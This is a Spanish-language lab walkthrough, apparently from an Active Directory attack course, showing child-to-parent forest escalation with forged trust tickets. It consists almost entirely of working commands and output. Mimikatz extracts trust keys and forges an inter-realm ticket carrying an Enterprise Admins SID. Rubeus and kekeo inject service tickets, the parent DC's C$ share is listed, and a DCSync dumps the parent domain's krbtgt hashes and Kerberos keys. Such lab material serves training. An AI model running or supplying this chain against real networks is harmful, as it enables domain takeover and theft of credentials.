Learning Objective - 18

Child to Parent using Trust Tickets

De los ejercicios anteriores obtuvimos las claves de confianza del dominio.

SMB         172.16.2.1      445    DCORP-DC         mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB         172.16.2.1      445    DCORP-DC         US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB         172.16.2.1      445    DCORP-DC         ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::

Si no lo hubieramos tenido, igual podemos extraerlo con cualquiera de estos comandos:

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Luego ejecutamos Mimikatz para crear el trust ticket.

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\tickets\trust_tkt.kirbi" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\tickets\trust_tkt.kirbi
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: f5b5c9f1ca76187393db1d3bb8ded94e - rc4_hmac_nt
Service   : krbtgt
Target    : moneycorp.local
Lifetime  : 3/4/2024 12:44:13 AM ; 3/2/2034 12:44:13 AM ; 3/2/2034 12:44:13 AM
-> Ticket : C:\AD\Tools\tickets\trust_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

Luego, cargamos este ticket utilizando Rubeus.

PS C:\AD\Tools\tickets> ..\Rubeus.exe asktgs /ticket:C:\AD\Tools\tickets\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      doIFRDCCBUCgAwIBBaEDAgEWooIEJzCCBCNhggQfMIIEG6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
      MCmgAwIBAqEiMCAbBGNpZnMbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCA9IwggPOoAMCARKhAwIB
      C6KCA8AEggO8AwpqUTxrqk14Wmnulwq1KbWIfHnLq2j+1H4d9uwZ3DGW7oMIZQlVVws5i3yzMqw6ChDe
      Nr+y6yavEWqQXdC70XFHK7xgAB4F8Vb4n6T6yV2pPYDzTI/EGenWwfC2zt6rYk+x/yzsfcAxaCfcyXj/
      9rANq8CYBhqe5SCExz78/kvqmrfAs6bDQHR4jL5BkRcVnxXjC7EeTyAvWL6Jp9LerRJlB2lJJOIG6JZC
      Yh3QaREis4pifLcxEN494in/U2r2l+8XhOMGKXMyfZXYCeetrMqK4IeLCuekQ54UcBptnPpKa31/uMTv
      qkDD1rs4aa4U7y7m10ztfO5l4GsOWqBJBBcxP/HnIyqQhXckMKCzVSc1Gou41Ore0dW5v5xha0S6j8q2
      wLdjtijmsUv77ejoV/jHG3WBIU50dUABVKvj0ptngZZWU7hFvzHOIBNTy027KWN9+SXODRxQf7xsE2Tb
      4+gPVftL6WZgoU1m4GrWl6yFfeu9RWzyolTQ8oyXFMoJo1PLXVW0zN0/S+C/8BPpy8hfTxTNtJixC98W
      P6NNq7FONlu+Him/DwhGAfwLcfSLWspANBS5fqqpA+ZUDcAidZ5Mt+dJnCZ8DMQv8CDHc+vF1GA2+Quy
      H3MVVGOzNH4ThGejDxDoYp1sPn+E+pbp5URlQ5UpXBSEQ0Gq0odf8umS++pFnDdfIOC04KjAXZAKiC5V
      QdzWrAeHZ85PikpLPhe34naGXqtdCZ0b3yLkPKrLaLte4TRgl+pl1aedQHVaXM6wAGtldt9hgoIk1cNR
      XUaoQL/BJLDpBoSZQjcboFLSVx5zX0vunbrcpDo5FwhwP328eK67+3I+VyWp/++VB4o1OYe7UsEh6r0v
      tYz3LrsiwNC+/fEk/Uq9CsWiQBEiVQPz4Ap2XEX3+f1trglaOkeF1IuK/RDptdWunuff9mbBYItQ5h2m
      cqZBVIjjBebYmFRtpfXrsqRDAF+I9PbUsIWt3O1HMixOoqj7sJChNFV0+I1IaDZJBmNTSnz/V4oVpaU6
      5ltygsDAqiy1qFZuC5UPK9LhAm7hIEyByj+KpO0ZE5hTThD5vKYnXNmtqjSUU2AqzugnR2Wd1vZML7rp
      O4FqffMfWcUKjr1ev8P9ag6YNmFkzEdmU0AcN4v/W68zvnYpFWaEcbJAkt7F2yt3u3XRROorPfl2MzeX
      XCJOeVUeg+kjKZo12eR1iOSv+6itNlxzRW8F9fTXC43DbrQb0DYF47jGOdEIouB9KXjZ/YlLo+UP0v6m
      FW3DmBSjggEHMIIBA6ADAgEAooH7BIH4fYH1MIHyoIHvMIHsMIHpoCswKaADAgESoSIEIBq1KriszNTY
      nMLdIN8X17MhYisUeV7dQV3FNzkmYwx+oRwbGmRvbGxhcmNvcnAubW9uZXljb3JwLmxvY2FsohowGKAD
      AgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI0MDMwNDA4NDQzNVqmERgPMjAyNDAz
      MDQxODQ0MzVapxEYDzIwMjQwMzExMDg0NDM1WqgRGw9NT05FWUNPUlAuTE9DQUypKzApoAMCAQKhIjAg
      GwRjaWZzGxhtY29ycC1kYy5tb25leWNvcnAubG9jYWw=

  ServiceName              :  cifs/mcorp-dc.moneycorp.local
  ServiceRealm             :  MONEYCORP.LOCAL
  UserName                 :  Administrator
  UserRealm                :  dollarcorp.moneycorp.local
  StartTime                :  3/4/2024 12:44:35 AM
  EndTime                  :  3/4/2024 10:44:35 AM
  RenewTill                :  3/11/2024 1:44:35 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  GrUquKzM1Nicwt0g3xfXsyFiKxR5Xt1BXcU3OSZjDH4=


PS C:\AD\Tools\tickets>klis

Luego verificamos el ticket.

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0xe922452

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: cifs/mcorp-dc.moneycorp.local @ MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 3/4/2024 0:44:35 (local)
        End Time:   3/4/2024 10:44:35 (local)
        Renew Time: 3/11/2024 0:44:35 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
PS C:\AD\Tools\tickets>

Y luego, listar el directorio C del dc del dominio padre.

PS C:\AD\Tools\tickets> ls \\mcorp-dc.moneycorp.local\c$


    Directory: \\mcorp-dc.moneycorp.local\c$


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---        11/10/2022   9:53 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---        11/11/2022   6:33 AM                Users
d-----         1/10/2024   1:35 AM                Windows

Tambien podemos cargar el ticket utilizando kekeo.

.\asktgs.exe C:\AD\Tools\tickets\trust_tkt.kirbi CIFS/mcorpdc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$

Usando otro servicio como LDAP

Creamos el ticket de la manera normal.

C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:trust_tkt.kirbi" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:f5b5c9f1ca76187393db1d3bb8ded94e /service:krbtgt /target:moneycorp.local /ticket:trust_tkt.kirbi
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: f5b5c9f1ca76187393db1d3bb8ded94e - rc4_hmac_nt
Service   : krbtgt
Target    : moneycorp.local
Lifetime  : 3/4/2024 2:03:54 AM ; 3/2/2034 2:03:54 AM ; 3/2/2034 2:03:54 AM
-> Ticket : trust_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

Luego con Rubeus creamos el ticket pero con el servicio LDAP.

C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:ldap/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'ldap/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      doIF3DCCBdigAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
      MCmgAwIBAqEiMCAbBGxkYXAbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCBGowggRmoAMCARKhAwIB
      C6KCBFgEggRU+03OnEP2whgc6Mr8DZQnF9e0TmYn7ScKjWZVDSLIyuFgdud7fpTcEEwWUtVy+UIuPXY4
      neTohna7fjC5i7WxW2OOg/6OnT2qmS5c0tG0vOzmqQsi6mLjdgtuddL4rbdICeg8PdMrszPHy94d9eMA
      7pdZppeyAQxXUVEokZ/ttKOILLpTRbfL+tJn5wnxbN2zbqUpJ0ct0vKC68JJ+4jBLYjMaS+VaXRDXI7N
      hTcosFPhq1O1ZN/9hVXvFxx5JLAFYS7lorYfBk3l6pwF8bA1emznE+KtXxutkUroAV0V7BvSMFQoEONs
      i0o5nI2ELYJnADhyXodbtxuKD31def3vkd6+dgALVw41gxGmpkT03Oyj+5DCsavFaAUmhvUEGieBeVG+
      ID371oatgufPv2tep0OPRp4WebqoEOhuIiM2c2ecRNtJizRhqsKaAQK0IGuyVvnNtMVkWyWALxwRMTaj
      RK6p6NjUzKXyYszFWTqAuB0XjhuuJyCE3bjDoqz2ryvRRqNZPiCtcry3JS56lHbnlRrfmOsvP6uhUSvm
      QcktVSFFfTM6HHBSTKVBDA4h5NLWwPRcYRPKRiEOs8LX59K6EpqVXdh71CsAdE/vkGNCf8jNo7qqKimx
      PF+UDtg4rqAhaDJkSJTFrhECsjS2vHT0R30JFnHjaxwQuLQ+dX5mUqtMZRFYZnVJaOEVFpoViRxR5mKZ
      iU5fqO5iyohYr+1FDuIqjrkzeU8NgYxwmqMkstSXifzEPTzPKQbU5UjRAzJIwmjlqGyyJ5Rcv7xGrOEj
      8U45xphz+fCULUhkDaJmllrSRF0BhWTlDoIeo83p7FGpxu3NqXwKjI4kNhRcEjarkOei78kR4jPNUMTY
      hhNHie+QXSY5o5a0KbFV/ZUVcmDyWL0NtjoBymffbdXnhhAyNXvvZR2wiq33vLbV3uizs4TZV96jrFfB
      iTVIaInJdwtMU/xzcvlryGsVGp/p9H17A9oS+knUME5U30rjEdtzL0I7a7EvHKoXMB6jqN6fsOjkPR/c
      XtqkOGHOzmBBuzIknQy7exo2EKM0JSLRrNmyiw7eK15Hz1g9xR+FqQrnIt127lqKOvIpXX8ldD0pQnvP
      39BA/dBW8azNkc+51fG4AOBQ//2t/NXmJ2XKwKr5IHNK1L5Tbs5Teh/QChYIORPkJePX0v6lNOXL5Vv/
      eKnW7Y6x70IQ5Xo2ZPJyHIDJyRt8Ez6S3pfiYM8r+lWc/5puA9eQ+n2o/h8KQBVK1JEoqB7tYVQVRlps
      xwYeyb8xYcsb1aTPLF8+jKak8rGfx2ran0KJPjwaKMqCq1kBUQ7oufB2pMG8fTs+/MfNhoYxs9KFwlK/
      SAe/iS76w9LEBMEKp3IOyhRMlRg5/C0ET43fyip4rK4EO4OwNlWUxwGd/9ClzJ6NmsknyUMLiUPiPmf6
      YT7TkrlKR344fnWipGH/3X29yqTJ5Q3WUbeXXRMuMVjE1KKbp6OCAQcwggEDoAMCAQCigfsEgfh9gfUw
      gfKgge8wgewwgemgKzApoAMCARKhIgQgzVRECQa2o6gQKNKKsn+6DCGmkeQZKrcUmybcgyuawyOhHBsa
      ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBA
      pQAApREYDzIwMjQwMzA0MTAwNDI2WqYRGA8yMDI0MDMwNDIwMDQyNlqnERgPMjAyNDAzMTExMDA0MjZa
      qBEbD01PTkVZQ09SUC5MT0NBTKkrMCmgAwIBAqEiMCAbBGxkYXAbGG1jb3JwLWRjLm1vbmV5Y29ycC5s
      b2NhbA==

  ServiceName              :  ldap/mcorp-dc.moneycorp.local
  ServiceRealm             :  MONEYCORP.LOCAL
  UserName                 :  Administrator
  UserRealm                :  dollarcorp.moneycorp.local
  StartTime                :  3/4/2024 2:04:26 AM
  EndTime                  :  3/4/2024 12:04:26 PM
  RenewTill                :  3/11/2024 3:04:26 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  zVRECQa2o6gQKNKKsn+6DCGmkeQZKrcUmybcgyuawyM=

Luego, ejecutamos un DCSync sobre el dominio moneycorp.local

C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/11/2022 9:46:24 PM
Object Security ID   : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
    ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
    lm  - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
    Default Salt : MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
      aes128_hmac       (4096) : 801bb69b81ef9283f280b97383288442
      des_cbc_md5       (4096) : c20dc80d51f7abd9

* Primary:Kerberos *
    Default Salt : MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : c20dc80d51f7abd9

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  49fec950691bbeba1b0d33d5a48d0293
    02  0b0c4dbc527ee3154877e070d043cd0d
    03  987346e7f810d2b616da385b0c2549ec
    04  49fec950691bbeba1b0d33d5a48d0293
    05  0b0c4dbc527ee3154877e070d043cd0d
    06  333eda93ecfba8d60c57be7f59b14c62
    07  49fec950691bbeba1b0d33d5a48d0293
    08  cdf2b153a374773dc94ee74d14610428
    09  cdf2b153a374773dc94ee74d14610428
    10  a6687f8a2a0a6dfd7c054d63c0568e61
    11  3cf736e35d2a54f1b0c3345005d3f962
    12  cdf2b153a374773dc94ee74d14610428
    13  50f935f7e1b88f89fba60ed23c8d115c
    14  3cf736e35d2a54f1b0c3345005d3f962
    15  06c616b2109569ddd69c8fc00c6a413c
    16  06c616b2109569ddd69c8fc00c6a413c
    17  179b9c2fd5a34cbb6013df534bf05726
    18  5f217f838649436f34bbf13ccb127f44
    19  3564c9de46ad690b83268cde43c21854
    20  1caa9da91c85a1e176fb85cdefc57587
    21  27b7de3c5a16e7629659152656022831
    22  27b7de3c5a16e7629659152656022831
    23  65f5f95db76e43bd6c4ad216b7577604
    24  026c59a45699b631621233cb38733174
    25  026c59a45699b631621233cb38733174
    26  342a52ec1d3b39d90af55460bcda72e8
    27  ef1e1a688748f79d16e8e32318f51465
    28  9e93ee8e0bcccb1451face3dba22cc69
    29  480da975c1dfc76717a63edc6bb29d7b


mimikatz(commandline) # exit
Bye!

PreviousLearning Objective - 17 NextLearning Objective - 19

Last updated 1 year ago

hashtagChild to Parent using Trust Tickets

hashtagUsando otro servicio como LDAP

Child to Parent using Trust Tickets

Usando otro servicio como LDAP